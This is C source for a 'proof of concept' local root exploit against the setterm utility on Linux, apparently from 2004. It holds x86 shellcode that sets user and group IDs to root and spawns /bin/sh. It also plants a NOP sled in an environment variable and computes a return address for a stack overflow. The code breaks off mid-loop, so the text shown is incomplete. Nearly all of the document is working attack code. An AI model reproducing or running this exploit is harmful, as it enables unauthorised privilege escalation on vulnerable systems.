/*********************************************************************** * setterm (All v3rs10nz) Proof of concept Xploit * * * * Author: Uz4yh4N Contact: Lord@linuxmail.org * * * * Tested Against Slackware and SuSe Distros. * * * * The bug was found 20 May 2004 03:35 * * Gr33t1ngz Efnet folk. * * This is a Lame stack overflow you know. But i think the Setterm * * is an important tool. * * And SPECIAL thanks to N4rK07IX * * Firtina oncesi sessizlik by Uz4yh4N * ***********************************************************************/ #include #include #include #include #define MAXDATA 4000 #define BEEP 1500 #define PATH "/usr/bin/setterm" // you can change this for your distro. #define PROG "setterm" char shelltoks[] = "\x31\xc0" // xor %eax,%eax "\x31\xdb" // xor %ebx,%ebx "\x31\xc9" // xor %ecx,%ecx "\xb0\x46" // mov $0x46,%al "\xcd\x80" // int $0x80 "\x31\xdb" // xor %ebx,%ebx "\x89\xd8" // mov %ebx,%eax "\xb0\x2e" // mov $0x2e,%al "\xcd\x80" // int $0x80 "\x31\xc0" // xor %eax,%eax "\x50" // push %eax "\x68\x2f\x2f\x73\x68" // push $0x68732f2f "\x68\x2f\x62\x69\x6e" // push $0x6e69622f "\x89\xe3" // mov %esp,%ebx "\x8d\x54\x24\x08" // lea 0x8(%esp,1),%edx "\x50" // push %eax "\x53" // push %ebx "\x8d\x0c\x24" // lea (%esp,1),%ecx "\xb0\x0b" // mov $0xb,%al "\xcd\x80" // int $0x80 "\x31\xc0" // xor %eax,%eax "\xb0\x01" // mov $0x1,%al "\xcd\x80"; // int $0x80 main() { char buffer[MAXDATA]; char ybuf[BEEP]; int i, *adr_p; printf("--> Setterm local stack overflow Proof of Concept Xploit\n"); printf("--> Author Uz4yh4N Lord@linuxmail.org\n"); memset(ybuf,0x90,sizeof(ybuf)); memcpy(&ybuf[BEEP-strlen(shelltoks)],shelltoks,strlen(shelltoks)); memcpy(ybuf,"SEXY=",5); putenv(ybuf); unsigned long ret = 0xBFFFFFFA - strlen(PATH) - strlen(ybuf); printf("--> Ret address at 0x%x\n", ret); printf("--> Evil buffer loading\n"); adr_p = (int *)(buffer); for(i=0;i